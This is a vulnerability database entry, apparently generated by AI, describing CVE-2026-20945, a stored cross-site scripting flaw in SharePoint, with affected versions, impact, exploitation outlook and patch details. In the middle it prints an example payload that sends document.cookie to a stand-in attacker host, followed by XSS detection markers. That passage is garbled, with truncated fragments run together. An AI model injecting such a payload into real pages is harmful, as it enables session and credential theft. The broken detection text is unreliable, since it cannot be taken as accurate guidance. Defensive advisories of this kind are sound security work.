
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-20945 is a stored cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint that allows an authenticated attacker with low-privilege access to perform spoofing attacks over a network. The vulnerability was disclosed on April 14, 2026, as part of Microsoft's April 2026 Patch Tuesday security update. Affected products include Microsoft SharePoint Server Subscription Edition (versions prior to 16.0.19725.20210), Microsoft SharePoint Enterprise Server 2016 (versions prior to 16.0.5548.1003), and Microsoft SharePoint Server 2019 (versions prior to 16.0.10417.20114). The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Microsoft MSRC).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), arising from insufficient sanitization of user-supplied input before it is rendered in SharePoint web pages. An authenticated attacker with low privileges can inject malicious scripts that are stored and later executed in the browsers of other users who view the affected content, enabling spoofing attacks. Exploitation requires user interaction (a victim must view the attacker-controlled content) and network access, but does not require elevated privileges beyond a standard authenticated account. Associated attack patterns include stored XSS (CAPEC-592), reflected XSS (CAPEC-591), and DOM-based XSS (CAPEC-588) (Microsoft MSRC).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, resulting in low-impact confidentiality and integrity compromise (e.g., session token theft, credential harvesting, or UI redirection/spoofing). Availability is not impacted. Because the vulnerability is stored (persistent), a single injection can affect multiple users who subsequently visit the compromised SharePoint page, potentially enabling broader phishing or lateral movement within an organization's SharePoint environment (Microsoft MSRC).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Microsoft MSRC). The EPSS score is approximately 0.058%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in an input field that is not properly sanitized.%3Cscript%3E, javascript:, onerror=) in input fields.<script> tags or event handler attributes (e.g., onload, onerror, onmouseover).Microsoft released security updates on April 14, 2026, addressing this vulnerability. Organizations should apply the following patched versions: SharePoint Server Subscription Edition (16.0.19725.20210 or later), SharePoint Enterprise Server 2016 (16.0.5548.1003 or later), and SharePoint Server 2019 (16.0.10417.20114 or later). No specific configuration-based workaround has been published; upgrading to the patched version is the recommended remediation. As a defense-in-depth measure, organizations should enforce Content Security Policy (CSP) headers and restrict SharePoint content editing permissions to trusted users (Microsoft MSRC).
The vulnerability was covered as part of broader April 2026 Patch Tuesday roundups by security outlets including BleepingComputer, Tenable, Zero Day Initiative (ZDI), and Lansweeper, which collectively noted the large patch volume (163–167 CVEs addressed) but did not single out CVE-2026-20945 as a high-priority concern given its medium severity rating (BleepingComputer, Tenable, ZDI). CyberSecurity Dive published a brief noting the medium-severity SharePoint flaw. No significant researcher commentary or social media controversy was observed specific to this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."